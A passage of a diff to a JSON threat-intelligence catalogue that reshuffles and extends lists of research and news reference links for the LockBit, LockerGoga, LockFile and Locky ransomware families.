"https://blogs.vmware.com/security/2022/10/lockbit-3-0-also-known-as-lockbit-black.html", - "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound", - "https://cluster25.io/2022/07/06/lockbit-3-0-making-the-ransomware-great-again/", - "https://www.bleepingcomputer.com/news/security/blackmatter-ransomware-moves-victims-to-lockbit-after-shutdown/", - "https://blog.morphisec.com/the-babadeda-crypter-targeting-crypto-nft-defi-communities", - "https://medium.com/@amgedwageh/lockbit-ransomware-analysis-notes-93a542fc8511", - "https://lifars.com/wp-content/uploads/2022/02/LockBitRansomware_Whitepaper.pdf", - "https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/", - "https://cybergeeks.tech/a-technical-analysis-of-the-leaked-lockbit-3-0-builder/", - "https://security.packt.com/understanding-lockbit/", - "https://analyst1.com/ransomware-diaries-volume-1/", - "https://www.bleepingcomputer.com/news/security/energy-group-erg-reports-minor-disruptions-after-ransomware-attack/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", - "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/", - "https://www.dragos.com/blog/industry-news/dragos-ics-ot-ransomware-analysis-q4-2021/", - "https://blog.cyble.com/2021/08/16/a-deep-dive-analysis-of-lockbit-2-0/", - "https://securityaffairs.com/141666/cyber-crime/lockbit-green-ransomware-variant.html", - "https://www.bleepingcomputer.com/news/security/lockbit-ransomware-gang-claims-attack-on-bridgestone-americas/", - "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", "https://www.dr.dk/nyheder/viden/teknologi/frygtede-skulle-lukke-alle-vindmoeller-nu-aabner-vestas-op-om-hacking-angreb", - "https://www.bleepingcomputer.com/news/security/popular-russian-hacking-forum-xss-bans-all-ransomware-topics/", - "https://documents.trendmicro.com/assets/pdf/datasheet-ransomware-in-Q1-2022.pdf", - "https://talos-intelligence-site.s3.amazonaws.com/production/document_files/files/000/095/481/original/010421_LockBit_Interview.pdf", - "https://www.glimps.fr/dcouverte-dune-nouvelle-version-du-ramsomware-lockbit/", - "https://www.prodaft.com/m/reports/LockBit_Case_Report___TLPWHITE.pdf", - "https://www.bleepingcomputer.com/news/security/lockbit-ransomware-gang-gets-aggressive-with-triple-extortion-tactic/", - "https://medium.com/s2wlab/w4-jan-en-story-of-the-week-ransomware-on-the-darkweb-7595544363b1", - "https://www.crowdstrike.com/blog/better-together-global-attitude-survey-takeaways-2021/", - "https://seguranca-informatica.pt/malware-analysis-details-on-lockbit-ransomware/", - "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", - "https://www.bleepingcomputer.com/news/security/uk-rail-network-merseyrail-likely-hit-by-lockbit-ransomware/", - "https://www.mbsd.jp/2021/10/27/assets/images/MBSD_WhitePaper_A-deep-dive-analysis-of-LockBit2.0_Ransomware.pdf", - "https://asec.ahnlab.com/ko/39682/", - "https://news.sophos.com/en-us/2022/04/12/attackers-linger-on-government-agency-computers-before-deploying-lockbit-ransomware/", - "https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility", - "https://www.ic3.gov/Media/News/2022/220204.pdf", - "https://amgedwageh.medium.com/lockbit-ransomware-analysis-notes-93a542fc8511", - "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", - "https://www.netskope.com/blog/netskope-threat-coverage-lockbit", - "https://www.youtube.com/watch?v=C733AyPzkoc", - "https://ke-la.com/lockbit-2-0-interview-with-russian-osint/", - "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html", - "https://www.zdnet.com/article/ransomware-hits-helicopter-maker-kopter/", - "https://www.cybereason.com/blog/threat-analysis-report-lockbit-2.0-all-paths-lead-to-ransom", - "https://securelist.com/modern-ransomware-groups-ttps/106824/", - "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/", - "https://news.sophos.com/en-us/2020/10/21/lockbit-attackers-uses-automated-attack-tools-to-identify-tasty-targets", - "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/", - "https://securityintelligence.com/posts/lockbit-ransomware-attacks-surge-affiliate-recruitment/", - "https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/", - "https://www.connectwise.com/resources/lockbit-profile", - "https://www.fortinet.com/blog/threat-research/ransomware-roundup-new-variants", - "https://www.trendmicro.com/en_us/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html", - "https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel", - "https://redcanary.com/blog/intelligence-insights-november-2021/", - "https://therecord.media/conti-ransomware-gang-chats-leaked-by-pro-ukraine-member/", - "https://www.logpoint.com/en/blog/hunting-lockbit-variations-using-logpoint/", - "https://intel471.com/blog/privateloader-malware", - "https://www.seqrite.com/blog/indian-power-sector-targeted-with-latest-lockbit-3-0-variant/", - "https://news.sophos.com/en-us/2020/04/24/lockbit-ransomware-borrows-tricks-to-keep-up-with-revil-and-maze/", - "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/d/thwarting-loaders-from-socgholish-to-blisters-lockbit-payload/iocs-thwarting-loaders-socgholish-blister.txt", - "https://therecord.media/missed-opportunity-bug-in-lockbit-ransomware-allowed-free-decryptions/", - "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack", - "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf", - "https://therecord.media/australian-cybersecurity-agency-warns-of-spike-in-lockbit-ransomware-attacks/", - "https://www.bleepingcomputer.com/news/security/lockbit-victim-estimates-cost-of-ransomware-attack-to-be-42-million/", - "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/", - "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/", - "https://www.glimps.fr/lockbit3-0/", - "https://www.fortinet.com/blog/threat-research/emerging-lockbit-campaign", - "https://www.trendmicro.com/en_us/research/21/h/lockbit-resurfaces-with-version-2-0-ransomware-detections-in-chi.html", - "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html", - "https://skyblue.team/posts/hive-recovery-from-lockbit-2.0/", - "https://unit42.paloaltonetworks.com/lockbit-2-ransomware/", - "https://www.advanced-intel.com/post/from-russia-with-lockbit-ransomware-inside-look-preventive-solutions", - "https://www.seqrite.com/blog/uncovering-lockbit-blacks-attack-chain-and-anti-forensic-activity/", - "https://news.sophos.com/en-us/2022/11/30/lockbit-3-0-black-attacks-and-leaks-reveal-wormable-capabilities-and-tooling/", - "https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf", - "https://intel471.com/blog/conti-ransomware-cooperation-maze-lockbit-ragnar-locker", - "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-april-1st-2022-i-can-fight-with-a-keyboard/", - "https://medium.com/s2wblog/quick-overview-of-leaked-lockbit-3-0-black-builder-program-880ae511d085", - "https://www.crowdstrike.com/blog/how-crowdstrike-prevents-volume-shadow-tampering-by-lockbit-ransomware/", - "https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html", - "https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/", "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions", - "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-lockbit", + "https://chuongdong.com/reverse%20engineering/2022/03/19/LockbitRansomware/", + "https://news.sophos.com/en-us/2020/04/24/lockbit-ransomware-borrows-tricks-to-keep-up-with-revil-and-maze/", + "https://blog.talosintelligence.com/talos-ir-q2-2023-quarterly-recap/", + "https://www.intrinsec.com/alphv-ransomware-gang-analysis", + "https://lifars.com/wp-content/uploads/2022/02/LockBitRansomware_Whitepaper.pdf", "https://www.trendmicro.com/en_us/research/22/a/analysis-and-Impact-of-lockbit-ransomwares-first-linux-and-vmware-esxi-variant.html", - "https://www.bleepingcomputer.com/news/security/lockbit-ransomware-now-encrypts-windows-domains-using-group-policies/", - "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf", - "https://techcommunity.microsoft.com/t5/security-compliance-and-identity/part-1-lockbit-2-0-ransomware-bugs-and-database-recovery/ba-p/3254354", - "https://www.trendmicro.com/en_us/research/22/g/lockbit-ransomware-group-augments-its-latest-variant--lockbit-3-.html", + "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/", "https://medium.com/s2wlab/w4-july-en-story-of-the-week-ransomware-on-the-darkweb-c61965d0386a", + "https://www.cisa.gov/sites/default/files/2023-06/aa23-165a_understanding_TA_LockBit_0.pdf", + "https://www.bleepingcomputer.com/news/security/uk-rail-network-merseyrail-likely-hit-by-lockbit-ransomware/", + "https://intel471.com/blog/conti-ransomware-cooperation-maze-lockbit-ragnar-locker", + "https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html", + "https://news.sophos.com/en-us/2022/04/12/attackers-linger-on-government-agency-computers-before-deploying-lockbit-ransomware/", + "https://research.loginsoft.com/threat-research/taming-the-storm-understanding-and-mitigating-the-consequences-of-cve-2023-27350/", + "https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/", + "https://securityaffairs.com/141666/cyber-crime/lockbit-green-ransomware-variant.html", + "https://securityintelligence.com/posts/lockbit-ransomware-attacks-surge-affiliate-recruitment/", + "https://www.bleepingcomputer.com/news/security/ransomware-attack-hits-italys-lazio-region-affects-covid-19-site/", + "https://asec.ahnlab.com/en/35822/", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/d/thwarting-loaders-from-socgholish-to-blisters-lockbit-payload/iocs-thwarting-loaders-socgholish-blister.txt", + "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", + "https://medium.com/s2wlab/w4-jan-en-story-of-the-week-ransomware-on-the-darkweb-7595544363b1", "https://unit42.paloaltonetworks.com/emerging-ransomware-groups/", - "https://www.lemagit.fr/actualites/252516821/Ransomware-LockBit-30-commence-a-etre-utilise-dans-des-cyberattaques", + "https://documents.trendmicro.com/assets/pdf/datasheet-ransomware-in-Q1-2022.pdf", + "https://securelist.com/crimeware-report-lockbit-switchsymb/110068/", + "https://medium.com/@amgedwageh/lockbit-ransomware-analysis-notes-93a542fc8511", + "https://blog.minerva-labs.com/lockbit-3.0-aka-lockbit-black-is-here-with-a-new-icon-new-ransom-note-new-wallpaper-but-less-evasiveness", + "https://asec.ahnlab.com/ko/39682/", + "https://id-ransomware.blogspot.com/search?q=lockbit", + "https://news.sophos.com/en-us/2020/10/21/lockbit-attackers-uses-automated-attack-tools-to-identify-tasty-targets", + "https://ke-la.com/lockbit-2-0-interview-with-russian-osint/", + "https://cluster25.io/2022/07/06/lockbit-3-0-making-the-ransomware-great-again/", + "https://www.connectwise.com/resources/lockbit-profile", + "https://www.dragos.com/blog/industry-news/dragos-ics-ot-ransomware-analysis-q4-2021/", + "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html", + "https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/", + "https://asec.ahnlab.com/en/41450/", + "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/", + "https://www.bleepingcomputer.com/news/security/lockbit-ransomware-now-encrypts-windows-domains-using-group-policies/", + "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/", + "https://seguranca-informatica.pt/malware-analysis-details-on-lockbit-ransomware/", + "https://www.advanced-intel.com/post/from-russia-with-lockbit-ransomware-inside-look-preventive-solutions", + "https://yoroi.company/research/hunting-the-lockbit-gangs-exfiltration-infrastructures/", + "https://medium.com/s2wblog/quick-overview-of-leaked-lockbit-3-0-black-builder-program-880ae511d085", + "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023", + "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", + "https://www.cybereason.com/blog/threat-analysis-report-inside-the-lockbit-arsenal-the-stealbit-exfiltration-tool", + "https://www.netskope.com/blog/netskope-threat-coverage-lockbit", + "https://unit42.paloaltonetworks.com/lockbit-2-ransomware/", + "https://www.recordedfuture.com/blackmatter-ransomware-successor-darkside-revil/", + "https://www.seqrite.com/blog/indian-power-sector-targeted-with-latest-lockbit-3-0-variant/", + "https://www.cybereason.com/blog/threat-analysis-report-lockbit-2.0-all-paths-lead-to-ransom", + "https://www.trendmicro.com/en_us/research/22/g/lockbit-ransomware-group-augments-its-latest-variant--lockbit-3-.html", + "https://www.sentinelone.com/labs/lockbit-3-0-update-unpicking-the-ransomwares-latest-anti-analysis-and-evasion-techniques/", + "https://github.com/prodaft/malware-ioc/tree/master/PTI-257", + "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf", + "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", + "https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/", + "https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-blackmatter-lockbit-thor", + "https://therecord.media/missed-opportunity-bug-in-lockbit-ransomware-allowed-free-decryptions/", + "https://www.glimps.fr/lockbit3-0/", + "https://amgedwageh.medium.com/lockbit-ransomware-analysis-notes-93a542fc8511", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html", + "https://www.trendmicro.com/en_no/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html", + "https://blog.cyble.com/2021/08/16/a-deep-dive-analysis-of-lockbit-2-0/", + "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/", + "https://therecord.media/australian-cybersecurity-agency-warns-of-spike-in-lockbit-ransomware-attacks/", + "https://securelist.com/modern-ransomware-groups-ttps/106824/", + "https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel", "https://www.bleepingcomputer.com/news/security/lockbit-ransomware-recruiting-insiders-to-breach-corporate-networks/", + "https://github.com/EmissarySpider/ransomware-descendants", + "https://techcommunity.microsoft.com/t5/security-compliance-and-identity/part-1-lockbit-2-0-ransomware-bugs-and-database-recovery/ba-p/3254354", + "https://github.com/albertzsigovits/malware-notes/blob/master/Ransomware/Lockbit.md", + "https://www.crypsisgroup.com/insights/ransomwares-new-trend-exfiltration-and-extortion", + "https://techcommunity.microsoft.com/t5/security-compliance-and-identity/part-2-lockbit-2-0-ransomware-bugs-and-database-recovery/ba-p/3254421", + "https://krebsonsecurity.com/2023/05/russian-hacker-wazawaka-indicted-for-ransomware/", + "https://blog.morphisec.com/the-babadeda-crypter-targeting-crypto-nft-defi-communities", + "https://www.seqrite.com/blog/uncovering-lockbit-blacks-attack-chain-and-anti-forensic-activity/", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf", + "https://www.youtube.com/watch?v=C733AyPzkoc", + "https://therecord.media/conti-ransomware-gang-chats-leaked-by-pro-ukraine-member/", + "https://www.trendmicro.com/en_us/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html", + "https://intel471.com/blog/privateloader-malware", + "https://twitter.com/MsftSecIntel/status/1522690116979855360", + "https://www.crowdstrike.com/blog/better-together-global-attitude-survey-takeaways-2021/", + "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound", + "https://www.cybereason.com/blog/rising-threat-from-lockbit-ransomware", + "https://www.bleepingcomputer.com/news/security/energy-group-erg-reports-minor-disruptions-after-ransomware-attack/", "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1", + "https://cybergeeks.tech/a-technical-analysis-of-the-leaked-lockbit-3-0-builder/", + "https://www.bleepingcomputer.com/news/security/blackmatter-ransomware-moves-victims-to-lockbit-after-shutdown/", + "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/", + "https://www.bleepingcomputer.com/news/security/lockbit-victim-estimates-cost-of-ransomware-attack-to-be-42-million/", + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf", + "https://skyblue.team/posts/hive-recovery-from-lockbit-2.0/", + "https://blog.lexfo.fr/lockbit-malware.html", + "https://security.packt.com/understanding-lockbit/", + "https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility", + "https://therecord.media/an-interview-with-blackmatter-a-new-ransomware-group-thats-learning-from-the-mistakes-of-darkside-and-revil/", + "https://socradar.io/lockbit-3-another-upgrade-to-worlds-most-active-ransomware/", + "https://news.sophos.com/en-us/2022/11/30/lockbit-3-0-black-attacks-and-leaks-reveal-wormable-capabilities-and-tooling/", + "https://securityscorecard.com/research/the-increase-in-ransomware-attacks-on-local-governments", "https://securelist.com/new-ransomware-trends-in-2022/106457/", "https://www.trendmicro.com/vinfo/us/security/news/ransomware-by-the-numbers/lockbit-conti-and-blackcat-lead-pack-amid-rise-in-active-raas-and-extortion-groups-ransomware-in-q1-2022", - "https://socradar.io/lockbit-3-another-upgrade-to-worlds-most-active-ransomware/", - "https://www.cybereason.com/blog/threat-analysis-report-inside-the-lockbit-arsenal-the-stealbit-exfiltration-tool", - "https://blog.lexfo.fr/lockbit-malware.html", - "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf", + "https://www.zdnet.com/article/ransomware-hits-helicopter-maker-kopter/", + "https://www.bleepingcomputer.com/news/security/lockbit-ransomware-gang-gets-aggressive-with-triple-extortion-tactic/", + "https://www.bleepingcomputer.com/news/security/lockbit-ransomware-gang-claims-attack-on-bridgestone-americas/", + "https://www.fortinet.com/blog/threat-research/emerging-lockbit-campaign", + "https://analyst1.com/ransomware-diaries-volume-1/", + "https://www.glimps.fr/dcouverte-dune-nouvelle-version-du-ramsomware-lockbit/", + "https://www.ic3.gov/Media/News/2022/220204.pdf", + "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-lockbit", + "https://www.mbsd.jp/2021/10/27/assets/images/MBSD_WhitePaper_A-deep-dive-analysis-of-LockBit2.0_Ransomware.pdf", + "https://www.fortinet.com/blog/threat-research/ransomware-roundup-new-variants", "https://blog.cyble.com/2022/07/05/lockbit-3-0-ransomware-group-launches-new-version/", - "https://www.recordedfuture.com/blackmatter-ransomware-successor-darkside-revil/", - "https://yoroi.company/research/hunting-the-lockbit-gangs-exfiltration-infrastructures/", - "https://github.com/albertzsigovits/malware-notes/blob/master/Ransomware/Lockbit.md", - "https://techcommunity.microsoft.com/t5/security-compliance-and-identity/part-2-lockbit-2-0-ransomware-bugs-and-database-recovery/ba-p/3254421", - "https://therecord.media/an-interview-with-blackmatter-a-new-ransomware-group-thats-learning-from-the-mistakes-of-darkside-and-revil/", - "https://www.crypsisgroup.com/insights/ransomwares-new-trend-exfiltration-and-extortion" + "https://blogs.vmware.com/security/2022/10/lockbit-3-0-also-known-as-lockbit-black.html", + "https://www.prodaft.com/m/reports/LockBit_Case_Report___TLPWHITE.pdf", + "https://talos-intelligence-site.s3.amazonaws.com/production/document_files/files/000/095/481/original/010421_LockBit_Interview.pdf", + "https://www.coveware.com/blog/2022/1/26/ransomware-as-a-service-innovation-curve", + "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-april-1st-2022-i-can-fight-with-a-keyboard/", + "https://redcanary.com/blog/intelligence-insights-november-2021/", + "https://www.trendmicro.com/en_us/research/21/h/lockbit-resurfaces-with-version-2-0-ransomware-detections-in-chi.html", + "https://www.bleepingcomputer.com/news/security/popular-russian-hacking-forum-xss-bans-all-ransomware-topics/", + "https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf", + "https://www.crowdstrike.com/blog/how-crowdstrike-prevents-volume-shadow-tampering-by-lockbit-ransomware/", + "https://www.logpoint.com/en/blog/hunting-lockbit-variations-using-logpoint/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockbit-targets-servers", + "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/", + "https://www.lemagit.fr/actualites/252516821/Ransomware-LockBit-30-commence-a-etre-utilise-dans-des-cyberattaques", + "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack" ], "synonyms": [ "ABCD Ransomware" @@ -31472,27 +32983,27 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lockergoga", - "https://content.fireeye.com/m-trends/rpt-m-trends-2020", - "https://blog.talosintelligence.com/lockergoga/", - "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/csi-evidence-indicators-for-targeted-ransomware-attacks-part-ii/", - "https://www.nrk.no/norge/skreddersydd-dobbeltangrep-mot-hydro-1.14480202", "https://www.mandiant.com/resources/financially-motivated-actors-are-expanding-access-into-ot", - "https://www.abuse.io/lockergoga.txt", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf", - "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html", + "https://blog.talosintelligence.com/lockergoga/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://www.youtube.com/watch?v=o6eEN0mUakM", + "https://www.bleepingcomputer.com/news/security/fbi-issues-alert-for-lockergoga-and-megacortex-ransomware/", + "https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-transnaczionalne-zlochinne-ugrupovannya-u-nanesenni-inozemnim-kompaniyam-120-miljoniv-dolariv-zbitkiv/", + "https://www.nrk.no/norge/skreddersydd-dobbeltangrep-mot-hydro-1.14480202", + "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html", "https://doublepulsar.com/how-lockergoga-took-down-hydro-ransomware-used-in-targeted-attacks-aimed-at-big-business-c666551f5880", "https://www.europol.europa.eu/newsroom/news/12-targeted-for-involvement-in-ransomware-attacks-against-critical-infrastructure", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", - "https://www.bleepingcomputer.com/news/security/new-lockergoga-ransomware-allegedly-used-in-altran-attack/", - "https://www.helpnetsecurity.com/2019/04/02/aurora-decrypter-mira-decrypter/", - "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", - "https://dragos.com/wp-content/uploads/Spyware-Stealer-Locker-Wiper-LockerGoga-Revisited.pdf", - "https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-transnaczionalne-zlochinne-ugrupovannya-u-nanesenni-inozemnim-kompaniyam-120-miljoniv-dolariv-zbitkiv/", "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", - "https://www.govcert.admin.ch/blog/36/severe-ransomware-attacks-against-swiss-smes", + "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", + "https://www.helpnetsecurity.com/2019/04/02/aurora-decrypter-mira-decrypter/", + "https://www.bleepingcomputer.com/news/security/new-lockergoga-ransomware-allegedly-used-in-altran-attack/", "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html", - "https://www.bleepingcomputer.com/news/security/fbi-issues-alert-for-lockergoga-and-megacortex-ransomware/" + "https://dragos.com/wp-content/uploads/Spyware-Stealer-Locker-Wiper-LockerGoga-Revisited.pdf", + "https://www.abuse.io/lockergoga.txt", + "https://www.govcert.admin.ch/blog/36/severe-ransomware-attacks-against-swiss-smes", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/csi-evidence-indicators-for-targeted-ransomware-attacks-part-ii/", + "https://content.fireeye.com/m-trends/rpt-m-trends-2020", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf" ], "synonyms": [], "type": [] @@ -31505,19 +33016,19 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lockfile", - "https://news.sophos.com/en-us/2021/08/23/proxyshell-vulnerabilities-in-microsoft-exchange-what-to-do/", "https://nsfocusglobal.com/insights-into-ransomware-spread-using-exchange-1-day-vulnerabilities-1-2/", - "https://decoded.avast.io/threatintel/decryptor-for-atomsilo-and-lockfile-ransomware/", "https://twitter.com/VirITeXplorer/status/1428750497872232459", - "https://www.csoonline.com/article/3631517/lockfile-ransomware-uses-intermittent-encryption-to-evade-detection.html", - "https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader", + "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/", "https://blog.cyble.com/2021/08/25/lockfile-ransomware-using-proxyshell-attack-to-deploy-ransomware/", "https://thehackernews.com/2021/08/lockfile-ransomware-bypasses-protection.html", + "https://news.sophos.com/en-us/2021/08/23/proxyshell-vulnerabilities-in-microsoft-exchange-what-to-do/", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows", + "https://www.csoonline.com/article/3631517/lockfile-ransomware-uses-intermittent-encryption-to-evade-detection.html", + "https://decoded.avast.io/threatintel/decryptor-for-atomsilo-and-lockfile-ransomware/", "https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-hive-ransomware/", - "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/", - "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", - "https://news.sophos.com/en-us/2021/08/27/lockfile-ransomwares-box-of-tricks-intermittent-encryption-and-evasion/" + "https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader", + "https://news.sophos.com/en-us/2021/08/27/lockfile-ransomwares-box-of-tricks-intermittent-encryption-and-evasion/", + "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself" ], "synonyms": [], "type": [] @@ -31530,29 +33041,29 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.locky", - "https://blog.botfrei.de/2017/08/weltweite-spamwelle-verbreitet-teufliche-variante-des-locky/", - "https://blog.malwarebytes.com/threat-analysis/2016/03/look-into-locky/", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf", "https://dissectingmalwa.re/picking-locky.html", - "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", - "http://web.archive.org/web/20181007211751/https://myonlinesecurity.co.uk/return-of-fake-ups-cannot-deliver-malspam-with-an-updated-nemucod-ransomware-and-kovter-payload/", - "https://threatpost.com/ransomware-gang-arrested-locky-hospitals/155842/", - "https://vixra.org/pdf/2002.0183v1.pdf", - "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", - "https://www.cylance.com/en_us/blog/threat-spotlight-locky-ransomware.html", - "https://www.bleepingcomputer.com/news/security/locky-ransomware-returns-but-targets-only-windows-xp-and-vista/", - "http://securityaffairs.co/wordpress/49094/malware/zepto-ransomware.html", - "https://storage.googleapis.com/pub-tools-public-publication-data/pdf/ce44cbda9fdc061050c1d2a5dec0270874a9dc85.pdf", - "https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process", - "https://blog.malwarebytes.com/threat-analysis/2017/01/locky-bart-ransomware-and-backend-server-analysis/", "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", - "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", - "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", + "http://securityaffairs.co/wordpress/49094/malware/zepto-ransomware.html", "https://intel471.com/blog/a-brief-history-of-ta505", - 